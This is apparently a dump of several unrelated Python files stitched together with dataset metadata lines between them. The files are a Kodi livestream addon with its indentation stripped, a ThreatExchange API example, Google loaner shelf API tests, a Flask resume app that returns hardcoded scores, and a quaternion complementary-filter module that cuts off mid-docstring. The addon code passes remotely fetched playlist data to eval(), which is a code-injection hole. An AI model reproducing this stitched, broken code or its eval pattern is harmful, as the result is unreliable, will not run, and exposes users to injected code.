try: title = channel.find('.//name').attrib['cn'].encode('utf-8')
except: title = ''
if not title:
try: title = channel.find('.//name').text
except: title = ''
tipo = channel.find('.//stream_type').text
sop_address = channel.find('.//item').text
if not tipo: tipo = "N/A"
if not title: title = "N/A"
thumbnail = ""
try:
thumbnail = channel.find('.//thumbnail').text
except: pass
if sop_address:
if thumbnail == "": thumbnail = addonpath + art + 'sopcast_link.png'
try: addDir_livestreams_common('[B][COLOR orange]' + title + ' [/B][/COLOR](' + tipo +')',sop_address,2,thumbnail,False)
except:pass
else: pass
except: pass
else: pass
def getData(url,fanart):
soup = getSoup(url)
if len(soup('channels')) > 0:
channels = soup('channel')
for channel in channels:
name = channel('name')[0].string
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),103,thumbnail,fanArt,desc,genre,date,credits,True)
except:
addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
else:
addon_log('No Channels: getItems')
getItems(soup('item'),fanart)
def getChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
items = channel_list('item')
try:
fanArt = channel_list('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
for channel in channel_list('subchannel'):
name = channel('name')[0].string
try:
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
pass
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
getItems(items,fanArt)
def getItems(items,fanart):
total = len(items)
addon_log('Total Items: %s' %total)
for item in items:
try:
name = item('title')[0].string
if name is None:
name = 'unknown?'
except:
addon_log('Name Error')
name = ''
try:
if item('epg'):
if item.epg_url:
addon_log('Get EPG Regex')
epg_url = item.epg_url.string
epg_regex = item.epg_regex.string
epg_name = get_epg(epg_url, epg_regex)
if epg_name:
name += ' - ' + epg_name
elif item('epg')[0].string > 1:
name += getepg(item('epg')[0].string)
else:
pass
except:
addon_log('EPG Error')
try:
url = []
for i in item('link'):
if not i.string == None:
url.append(i.string)
if len(url) < 1:
raise
except:
addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
continue
try:
thumbnail = item('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not item('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = item('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = item('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = item('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = item('date')[0].string
if date == None:
raise
except:
date = ''
regexs = None
if item('regex'):
try:
regexs = {}
for i in item('regex'):
regexs[i('name')[0].string] = {}
regexs[i('name')[0].string]['expre'] = i('expres')[0].string
regexs[i('name')[0].string]['page'] = i('page')[0].string
try:
regexs[i('name')[0].string]['refer'] = i('referer')[0].string
except:
addon_log("Regex: -- No Referer --")
try:
regexs[i('name')[0].string]['agent'] = i('agent')[0].string
except:
addon_log("Regex: -- No User Agent --")
regexs = urllib.quote(repr(regexs))
except:
regexs = None
addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
try:
if "RunPlugin" in url[0]:
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],106,thumbnail,fanArt,desc,genre,"credits",date)
except:
match = re.compile("&name=(.+?)\)").findall(url[0].replace(";",""))
if match:
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),removeNonAscii(url[0]),106,thumbnail,fanArt,desc,genre,credits,date)
except:
try:
addDir_livestreams(removeNonAscii(name.encode('utf-8', 'ignore')),removeNonAscii(url[0].replace(";","")),106,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
else:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
else:
if ('acestream://' in url[0]) or ('.acelive' in url[0]) or ('.torrent' in url[0]):
if 'plugin://' not in url[0]:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],1,thumbnail,fanArt,desc,genre,"credits",date)
else:
addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
elif 'sop://' in url[0]:
if 'plugin://' not in url[0]:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],2,thumbnail,fanArt,desc,genre,"credits",date)
else:
addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s))
def getSoup(url):
if url.startswith('http://'):
data = makeRequest(url)
else:
if xbmcvfs.exists(url):
if url.startswith("smb://") or url.startswith("nfs://"):
copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
if copy:
data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
else:
addon_log("failed to copy from smb:")
else:
data = open(url, 'r').read()
else:
addon_log("Soup Data not found!")
return
return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
def addon_log(string):
print(string)
def getRegexParsed(regexs, url):
regexs = eval(urllib.unquote(regexs))
cachedPages = {}
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in regexs:
m = regexs[k]
if m['page'] in cachedPages:
link = cachedPages[m['page']]
else:
req = urllib2.Request(m['page'])
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
if 'refer' in m:
req.add_header('Referer', m['refer'])
if 'agent' in m:
req.add_header('User-agent', m['agent'])
response = urllib2.urlopen(req)
link = response.read()
response.close()
cachedPages[m['page']] = link
reg = re.compile(m['expre']).search(link)
url = url.replace("$doregex[" + k + "]", reg.group(1).strip())
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
| 2.203125 | 2 |
RainIt/rain_it/ric/Procedure.py | luisgepeto/RainItPi | 0 | 7860 | <gh_stars>0
from ric.RainItComposite import RainItComposite
class Procedure(RainItComposite):
def __init__(self):
super().__init__()
def get_pickle_form(self):
return self
| 2.015625 | 2 |
1067.py | FahimFBA/URI-Problem-Solve | 3 | 7861 | <gh_stars>1-10
valor = int(input())
for i in range(valor+1):
    if i % 2 != 0:
print(i) | 2.9375 | 3 |
api-reference-examples/python/te-tag-query/api-example-update.py | b-bold/ThreatExchange | 997 | 7862 | #!/usr/bin/env python
# ================================================================
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ================================================================
import sys
import json
import TE
TE.Net.setAppTokenFromEnvName("TX_ACCESS_TOKEN")
postParams = {
"descriptor_id": "4036655176350945", # ID of the descriptor to be updated
"reactions": "INGESTED,IN_REVIEW",
}
showURLs = False
dryRun = False
validationErrorMessage, serverSideError, responseBody = TE.Net.updateThreatDescriptor(
postParams, showURLs, dryRun
)
if validationErrorMessage is not None:
sys.stderr.write(validationErrorMessage + "\n")
sys.exit(1)
if serverSideError is not None:
sys.stderr.write(str(serverSideError) + "\n")
sys.stderr.write(json.dumps(responseBody) + "\n")
sys.exit(1)
print(json.dumps(responseBody))
| 1.882813 | 2 |
loaner/web_app/backend/api/shelf_api_test.py | Bottom-Feeders/GrabNGO | 0 | 7863 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for backend.api.shelf_api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import mock
from protorpc import message_types
from google.appengine.api import search
import endpoints
from loaner.web_app.backend.api import root_api # pylint: disable=unused-import
from loaner.web_app.backend.api import shelf_api
from loaner.web_app.backend.api.messages import shared_messages
from loaner.web_app.backend.api.messages import shelf_messages
from loaner.web_app.backend.models import device_model
from loaner.web_app.backend.models import shelf_model # pylint: disable=unused-import
from loaner.web_app.backend.testing import loanertest
class ShelfApiTest(parameterized.TestCase, loanertest.EndpointsTestCase):
"""Test for the Shelf API."""
def setUp(self):
super(ShelfApiTest, self).setUp()
self.patcher_directory = mock.patch(
'__main__.device_model.directory.DirectoryApiClient')
self.mock_directoryclass = self.patcher_directory.start()
self.addCleanup(self.patcher_directory.stop)
self.service = shelf_api.ShelfApi()
self.login_admin_endpoints_user()
self.patcher_xsrf = mock.patch(
'__main__.shelf_api.root_api.Service.check_xsrf_token')
self.shelf = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='NYC', capacity=10,
friendly_name='GnG', latitude=40.6892534, longitude=-74.0466891,
altitude=1.0)
shelf1 = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='MTV', capacity=20)
shelf2 = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='SAO', capacity=10)
self.disabled_shelf = shelf_model.Shelf.enroll(
user_email=loanertest.USER_EMAIL, location='SVL', capacity=10,
friendly_name='Bay')
self.disabled_shelf.disable(loanertest.USER_EMAIL)
self.shelf_locations = [
self.shelf.location, shelf1.location, shelf2.location,
self.disabled_shelf.location]
self.device1_key = device_model.Device(
serial_number='12345',
enrolled=True,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_1',
damaged=False,
).put()
self.device2_key = device_model.Device(
serial_number='54321',
enrolled=True,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_2',
damaged=False,
).put()
self.device3_key = device_model.Device(
serial_number='67890',
enrolled=True,
shelf=self.shelf.key,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_3',
damaged=False,
).put()
self.device4_key = device_model.Device(
serial_number='ABC123',
enrolled=True,
shelf=self.shelf.key,
device_model='HP Chromebook 13 G1',
current_ou='/',
chrome_device_id='unique_id_4',
damaged=False,
).put()
self.device_identifiers = [
self.device1_key.get().serial_number,
self.device2_key.get().serial_number,
self.device3_key.get().serial_number]
def tearDown(self):
super(ShelfApiTest, self).tearDown()
self.service = None
@mock.patch('__main__.root_api.Service.check_xsrf_token')
@mock.patch('__main__.shelf_model.Shelf.enroll')
def test_enroll(self, mock_enroll, mock_xsrf_token):
"""Test Enroll with mock methods."""
request = shelf_messages.EnrollShelfRequest(
location='nyc', capacity=100, friendly_name='test', latitude=12.5,
longitude=12.5, altitude=2.0, responsible_for_audit='precise',
audit_interval_override=33, audit_notification_enabled=True)
response = self.service.enroll(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertIsInstance(response, message_types.VoidMessage)
def test_enroll_bad_request(self):
request = shelf_messages.EnrollShelfRequest(capacity=10)
with self.assertRaisesRegexp(
shelf_api.endpoints.BadRequestException,
'Entity has uninitialized properties'):
self.service.enroll(request)
request = shelf_messages.EnrollShelfRequest(
location='nyc', capacity=10, latitude=12.5)
with self.assertRaisesRegexp(
shelf_api.endpoints.BadRequestException,
shelf_model._LAT_LONG_MSG):
self.service.enroll(request)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_get_by_location(self, mock_xsrf_token):
request = shelf_messages.ShelfRequest(location='NYC')
response = self.service.get(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(self.shelf.location, response.location)
self.assertEqual(self.shelf.friendly_name, response.friendly_name)
def test_disable_by_location(self):
request = shelf_messages.ShelfRequest(location='NYC')
self.assertTrue(self.shelf.enabled)
response = self.service.disable(request)
self.assertFalse(self.shelf.enabled)
self.assertIsInstance(response, message_types.VoidMessage)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_update_using_location(self, mock_xsrf_token):
request = shelf_messages.UpdateShelfRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
location='NYC-9th')
response = self.service.update(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(self.shelf.location, 'NYC-9th')
shelf = shelf_model.Shelf.get(friendly_name='GnG')
self.assertEqual(shelf.location, 'NYC-9th')
self.assertIsInstance(response, message_types.VoidMessage)
@parameterized.parameters(
(shelf_messages.Shelf(capacity=10), 2,),
(shelf_messages.Shelf(enabled=False), 1,),
(shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='enabled:True capacity:10')), 2,),
(shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='enabled:False')), 1,))
@mock.patch('__main__.root_api.Service.check_xsrf_token')
def test_list_shelves(self, request, response_length, mock_xsrf_token):
response = self.service.list_shelves(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
self.assertEqual(response_length, len(response.shelves))
def test_list_shelves_invalid_page_size(self):
with self.assertRaises(endpoints.BadRequestException):
request = shelf_messages.Shelf(page_size=0)
self.service.list_shelves(request)
def test_list_shelves_with_search_constraints(self):
expressions = shared_messages.SearchExpression(expression='location')
expected_response = shelf_messages.ListShelfResponse(
shelves=[shelf_messages.Shelf(
location=self.shelf.location,
shelf_request=shelf_messages.ShelfRequest(
location=self.shelf.location,
urlsafe_key=self.shelf.key.urlsafe()))],
total_results=1, total_pages=1)
request = shelf_messages.Shelf(
query=shared_messages.SearchRequest(
query_string='location:NYC',
expressions=[expressions],
returned_fields=['location']))
response = self.service.list_shelves(request)
self.assertEqual(response, expected_response)
def test_list_shelves_with_offset(self):
    previous_shelf_locations = []
    request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=1)
    response = self.service.list_shelves(request)
    self.assertEqual(len(response.shelves), 1)
    previous_shelf_locations.append(response.shelves[0].location)
    # Get next page results and make sure it's not the same as the last one.
    request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=2)
    response = self.service.list_shelves(request)
    self.assertEqual(len(response.shelves), 1)
    self.assertNotIn(response.shelves[0].location, previous_shelf_locations)
    previous_shelf_locations.append(response.shelves[0].location)
    # Get next page results and make sure it's not the same as the last two.
    request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=3)
    response = self.service.list_shelves(request)
    self.assertEqual(len(response.shelves), 1)
    self.assertNotIn(response.shelves[0].location, previous_shelf_locations)
    previous_shelf_locations.append(response.shelves[0].location)
@mock.patch('__main__.root_api.Service.check_xsrf_token')
@mock.patch('__main__.shelf_api.logging.info')
def test_audit_using_shelf_location(self, mock_logging, mock_xsrf_token):
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
device_identifiers=self.device_identifiers)
response = self.service.audit(request)
self.assertEqual(mock_xsrf_token.call_count, 1)
mock_logging.assert_called()
for identifier in self.device_identifiers:
datastore_device = device_model.Device.get(serial_number=identifier)
self.assertEqual(datastore_device.shelf.get().location, 'NYC')
self.assertFalse(self.shelf.audit_requested)
self.assertEqual(self.shelf.last_audit_by, loanertest.SUPER_ADMIN_EMAIL)
self.assertIsInstance(response, message_types.VoidMessage)
def test_audit_invalid_device(self):
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location='NYC'),
device_identifiers=['Invalid'])
with self.assertRaisesRegexp(
endpoints.NotFoundException,
shelf_api._DEVICE_DOES_NOT_EXIST_MSG % 'Invalid'):
self.service.audit(request)
@mock.patch.object(device_model.Device, 'search')
@mock.patch.object(shelf_api, 'get_shelf', autospec=True)
def test_audit_remove_devices(
self, mock_get_shelf, mock_model_device_search):
    device = self.device2_key.get()
    device.shelf = self.shelf.key
    device.put()
mock_model_device_search.return_value = (
search.SearchResults(
results=[
search.ScoredDocument(
doc_id=self.device2_key.urlsafe()),
search.ScoredDocument(
doc_id=self.device3_key.urlsafe()),
search.ScoredDocument(
doc_id=self.device4_key.urlsafe())],
number_found=3))
mock_get_shelf.return_value = self.shelf
request = shelf_messages.ShelfAuditRequest(
shelf_request=shelf_messages.ShelfRequest(location=self.shelf.location),
device_identifiers=[self.device3_key.get().serial_number])
self.service.audit(request)
self.assertEqual(self.device3_key.get().shelf, self.shelf.key)
self.assertIsNone(self.device2_key.get().shelf)
self.assertIsNone(self.device4_key.get().shelf)
def test_get_shelf_urlsafe_key(self):
"""Test getting a shelf using the urlsafe key."""
request = shelf_messages.ShelfRequest(urlsafe_key=self.shelf.key.urlsafe())
shelf = shelf_api.get_shelf(request)
self.assertEqual(shelf, self.shelf)
def test_get_shelf_using_location(self):
"""Test getting a shelf using the location."""
request = shelf_messages.ShelfRequest(location=self.shelf.location)
shelf = shelf_api.get_shelf(request)
self.assertEqual(shelf, self.shelf)
def test_get_shelf_using_location_error(self):
"""Test getting a shelf with an invalid location."""
request = shelf_messages.ShelfRequest(location='Not_Valid')
with self.assertRaisesRegexp(
endpoints.NotFoundException,
shelf_api._SHELF_DOES_NOT_EXIST_MSG % request.location):
shelf_api.get_shelf(request)
if __name__ == '__main__':
loanertest.main()
| 1.679688 | 2 |
app/views/main.py | ArmandDS/ai_bert_resumes | 1 | 7864 | from flask import render_template, jsonify, Flask, redirect, url_for, request
from app import app
import random
import os
# import tensorflow as tf
# import numpy as np
# import sys
# import spacy
# nlp = spacy.load('en')
# sys.path.insert(0, "/content/bert_experimental")
# from bert_experimental.finetuning.text_preprocessing import build_preprocessor
# from bert_experimental.finetuning.graph_ops import load_graph
# restored_graph = load_graph("models/frozen_graph.pb")
# graph_ops = restored_graph.get_operations()
# input_op, output_op = graph_ops[0].name, graph_ops[-1].name
# x = restored_graph.get_tensor_by_name(input_op + ':0')
# y = restored_graph.get_tensor_by_name(output_op + ':0')
# preprocessor = build_preprocessor("./uncased_L-12_H-768_A-12/vocab.txt", 256)
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32], name='preprocessor')
# py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32])
# sess = tf.Session(graph=restored_graph)
# delimiter = " ||| "
@app.route('/')
def index1():
return render_template('index.html', title='Home')
@app.route('/predict', methods = ['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        exp_st = request.form.get('exp')
        job_st = request.form.get('job')
        # y_out = sess.run(y, feed_dict={
        #      x: pd.DataFrame([delimiter.join((exp_st, job_st))], columns=['name'])
        # })
        # doc1 = nlp(exp_st)
        # doc2 = nlp(job_st)
        # y_out2 = doc1.similarity(doc2)
        return render_template('index.html', title='Success', predictions=80,
                               predictions_sp=75, exp=exp_st, job=job_st)
    # Render the plain index page for GET requests instead of returning None.
    return render_template('index.html', title='Home')
@app.route('/index')
def index():
return render_template('index.html', title='Home')
@app.route('/map')
def map():
return render_template('map.html', title='Map')
@app.route('/map/refresh', methods=['POST'])
def map_refresh():
points = [(random.uniform(48.8434100, 48.8634100),
random.uniform(2.3388000, 2.3588000))
for _ in range(random.randint(2, 9))]
return jsonify({'points': points})
@app.route('/contact')
def contact():
return render_template('contact.html', title='Contact') | 2.21875 | 2 |
ahrs/filters/complementary.py | jaluebbe/ahrs | 0 | 7865 | # -*- coding: utf-8 -*-
"""
Complementary Filter
====================
Attitude quaternion obtained with gyroscope and accelerometer-magnetometer
measurements, via complementary filter.
First, the current orientation is estimated at time :math:`t`, from a previous
orientation at time :math:`t-1`, and a given angular velocity,
:math:`\\omega`, in rad/s.
This orientation is computed by numerically integrating the angular velocity
and adding it to the previous orientation, which is known as an **attitude
propagation**.
.. math::
\\begin{array}{rcl}
\\mathbf{q}_\\omega &=& \\Big(\\mathbf{I}_4 + \\frac{\\Delta t}{2}\\boldsymbol\\Omega_t\\Big)\\mathbf{q}_{t-1} \\\\
&=&
\\begin{bmatrix}
1 & -\\frac{\\Delta t}{2}\\omega_x & -\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z \\\\
\\frac{\\Delta t}{2}\\omega_x & 1 & \\frac{\\Delta t}{2}\\omega_z & -\\frac{\\Delta t}{2}\\omega_y \\\\
\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z & 1 & \\frac{\\Delta t}{2}\\omega_x \\\\
\\frac{\\Delta t}{2}\\omega_z & \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_x & 1
\\end{bmatrix}
\\begin{bmatrix}q_w \\\\ q_x \\\\ q_y \\\\ q_z \\end{bmatrix} \\\\
&=&
\\begin{bmatrix}
q_w - \\frac{\\Delta t}{2} \\omega_x q_x - \\frac{\\Delta t}{2} \\omega_y q_y - \\frac{\\Delta t}{2} \\omega_z q_z\\\\
q_x + \\frac{\\Delta t}{2} \\omega_x q_w - \\frac{\\Delta t}{2} \\omega_y q_z + \\frac{\\Delta t}{2} \\omega_z q_y\\\\
q_y + \\frac{\\Delta t}{2} \\omega_x q_z + \\frac{\\Delta t}{2} \\omega_y q_w - \\frac{\\Delta t}{2} \\omega_z q_x\\\\
q_z - \\frac{\\Delta t}{2} \\omega_x q_y + \\frac{\\Delta t}{2} \\omega_y q_x + \\frac{\\Delta t}{2} \\omega_z q_w
\\end{bmatrix}
\\end{array}
Secondly, the *tilt* is computed from the accelerometer measurements as:
.. math::
\\begin{array}{rcl}
\\theta &=& \\mathrm{arctan2}(a_y, a_z) \\\\
\\phi &=& \\mathrm{arctan2}\\big(-a_x, \\sqrt{a_y^2+a_z^2}\\big)
\\end{array}
Only the pitch, :math:`\\phi`, and roll, :math:`\\theta`, angles are computed,
leaving the yaw angle, :math:`\\psi` equal to zero.
If a magnetometer sample is available, the yaw angle can be computed. First
compensate the measurement using the *tilt*:
.. math::
\\begin{array}{rcl}
\\mathbf{b} &=&
\\begin{bmatrix}
\\cos\\theta & \\sin\\theta\\sin\\phi & \\sin\\theta\\cos\\phi \\\\
0 & \\cos\\phi & -\\sin\\phi \\\\
-\\sin\\theta & \\cos\\theta\\sin\\phi & \\cos\\theta\\cos\\phi
\\end{bmatrix}
\\begin{bmatrix}m_x \\\\ m_y \\\\ m_z\\end{bmatrix} \\\\
\\begin{bmatrix}b_x \\\\ b_y \\\\ b_z\\end{bmatrix} &=&
\\begin{bmatrix}
m_x\\cos\\theta + m_y\\sin\\theta\\sin\\phi + m_z\\sin\\theta\\cos\\phi \\\\
m_y\\cos\\phi - m_z\\sin\\phi \\\\
-m_x\\sin\\theta + m_y\\cos\\theta\\sin\\phi + m_z\\cos\\theta\\cos\\phi
\\end{bmatrix}
\\end{array}
Then, the yaw angle, :math:`\\psi`, is obtained as:
.. math::
\\begin{array}{rcl}
\\psi &=& \\mathrm{arctan2}(-b_y, b_x) \\\\
&=& \\mathrm{arctan2}\\big(m_z\\sin\\phi - m_y\\cos\\phi, \\; m_x\\cos\\theta + \\sin\\theta(m_y\\sin\\phi + m_z\\cos\\phi)\\big)
\\end{array}
We transform the roll-pitch-yaw angles to a quaternion representation:
.. math::
\\mathbf{q}_{am} =
\\begin{pmatrix}q_w\\\\q_x\\\\q_y\\\\q_z\\end{pmatrix} =
\\begin{pmatrix}
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) - \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\
\\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) - \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big)
\\end{pmatrix}
Finally, after each orientation is estimated independently, they are fused with
the complementary filter.
.. math::
\\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am}
where :math:`\\mathbf{q}_\\omega` is the attitude estimated from the gyroscope,
:math:`\\mathbf{q}_{am}` is the attitude estimated from the accelerometer and
the magnetometer, and :math:`\\alpha` is the gain of the filter.
The filter gain must be a floating value within the range :math:`[0.0, 1.0]`.
It can be seen that when :math:`\\alpha=1`, the attitude is estimated entirely
with the accelerometer and the magnetometer. When :math:`\\alpha=0`, it is
estimated solely with the gyroscope. The values within the range decide how
much of each estimation is "blended" into the quaternion.
This is actually a simple implementation of `LERP
<https://en.wikipedia.org/wiki/Linear_interpolation>`_ commonly used to
linearly interpolate quaternions with small differences between them.
"""
import numpy as np
from ..common.orientation import ecompass
class Complementary:
"""
Complementary filter for attitude estimation as quaternion.
Parameters
----------
gyr : numpy.ndarray, default: None
N-by-3 array with measurements of angular velocity, in rad/s.
acc : numpy.ndarray, default: None
N-by-3 array with measurements of acceleration, in m/s^2.
mag : numpy.ndarray, default: None
        N-by-3 array with measurements of magnetic field, in uT.
frequency : float, default: 100.0
        Sampling frequency in Hertz.
Dt : float, default: 0.01
Sampling step in seconds. Inverse of sampling frequency. Not required
if ``frequency`` value is given.
    gain : float, default: 0.9
Filter gain.
q0 : numpy.ndarray, default: None
Initial orientation, as a versor (normalized quaternion).
Raises
------
ValueError
When dimension of input arrays ``acc``, ``gyr``, or ``mag`` are not equal.
"""
def __init__(self,
gyr: np.ndarray = None,
acc: np.ndarray = None,
mag: np.ndarray = None,
frequency: float = 100.0,
                 gain: float = 0.9,
**kwargs):
self.gyr: np.ndarray = gyr
self.acc: np.ndarray = acc
self.mag: np.ndarray = mag
self.frequency: float = frequency
self.gain: float = gain
if not(0.0 <= self.gain <= 1.0):
raise ValueError(f"Filter gain must be in the range [0, 1]. Got {self.gain}")
self.Dt: float = kwargs.get('Dt', 1.0/self.frequency)
self.q0: np.ndarray = kwargs.get('q0')
# Process of given data
if self.gyr is not None and self.acc is not None:
self.Q = self._compute_all()
def _compute_all(self) -> np.ndarray:
"""
Estimate the quaternions given all data
Attributes ``gyr``, ``acc`` and, optionally, ``mag`` must contain data.
Returns
-------
Q : numpy.ndarray
M-by-4 Array with all estimated quaternions, where M is the number
of samples.
"""
if self.acc.shape != self.gyr.shape:
raise ValueError("acc and gyr are not the same size")
num_samples = len(self.acc)
Q = np.zeros((num_samples, 4))
if self.mag is None:
self.mag = [None]*num_samples
else:
if self.mag.shape != self.gyr.shape:
raise ValueError("mag and gyr are not the same size")
Q[0] = self.am_estimation(self.acc[0], self.mag[0]) if self.q0 is None else self.q0.copy()
for t in range(1, num_samples):
Q[t] = self.update(Q[t-1], self.gyr[t], self.acc[t], self.mag[t])
return Q
def attitude_propagation(self, q: np.ndarray, omega: np.ndarray, dt: float) -> np.ndarray:
"""
Attitude propagation of the orientation.
Estimate the current orientation at time :math:`t`, from a given
orientation at time :math:`t-1` and a given angular velocity,
:math:`\\omega`, in rad/s.
It is computed by numerically integrating the angular velocity and
adding it to the previous orientation.
Parameters
----------
q : numpy.ndarray
A-priori quaternion.
omega : numpy.ndarray
Tri-axial angular velocity, in rad/s.
dt : float
Time step, in seconds, between consecutive Quaternions.
Returns
-------
q_omega : numpy.ndarray
Estimated orientation, as quaternion.
"""
w = -0.5*dt*omega
A = np.array([
[1.0, -w[0], -w[1], -w[2]],
[w[0], 1.0, w[2], -w[1]],
[w[1], -w[2], 1.0, w[0]],
[w[2], w[1], -w[0], 1.0]])
q_omega = A @ q
return q_omega / np.linalg.norm(q_omega)
def am_estimation(self, acc: np.ndarray, mag: np.ndarray = None) -> np.ndarray:
"""
Attitude estimation from an Accelerometer-Magnetometer architecture.
Parameters
----------
acc : numpy.ndarray
Tri-axial sample of the accelerometer.
mag : numpy.ndarray, default: None
Tri-axial sample of the magnetometer.
Returns
-------
